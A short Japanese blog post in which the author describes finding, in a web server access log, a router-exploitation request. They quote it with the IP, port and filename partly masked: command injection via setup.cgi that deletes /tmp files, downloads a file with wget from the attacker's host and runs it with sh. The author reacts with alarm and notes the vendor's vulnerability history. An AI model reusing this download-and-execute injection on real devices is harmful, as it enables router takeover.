昨日、v6関係がうまく行っているかとwebサーバのアクセスログを見ていたら、偶然、何やら怖いものが目に入った(かなり伏せている)。
1ww.1xx.yy.zz - - [01/Dec/2020:AA:BB:CC +0900]
"GET /setup.cgi?next_file=!!!!!!!.cfg&todo=syscmd&
cmd=rm+-rf+/tmp/*;
wget+http://1ww.1xx.yy.zz:vvvvv+-O+/tmp/!!!!!!!;
sh+!!!!!!!&cur***=/&cur@@@@.htm=1 HTTP/1.0"
問題はcmd=...以降の部分で、最初は、これはひょっとして、"cmd=rm+-rf+/"(全ファイルの削除)でも行けるのではないかと思った。ただ、そうしてもルータが次回起動しなくなるだけだが、今見直すと、そのあとにwgetで外からファイルを送り込んで、sh以降でそれを実行していることに気付いた。
まあ、これは本当にルータの初期化とかファームウェアの更新の手順なのかも知れないが、乗っ取りにも使えそうではないか。そもそも、なぜ初期化とかのコマンドがこっちに来たんだ? 怖い・・・ (ちなみに、IPアドレスはC国だった)
とんでもないことができる、大穴の開いた製品だ。調べてみると、そのメーカー(海外のN社)のルータは結構前から今まで、脆弱性が沢山報告されているようだ。
今度買う時は、そういうことも調べないと安心できないな。
コメントを書く / Write a comment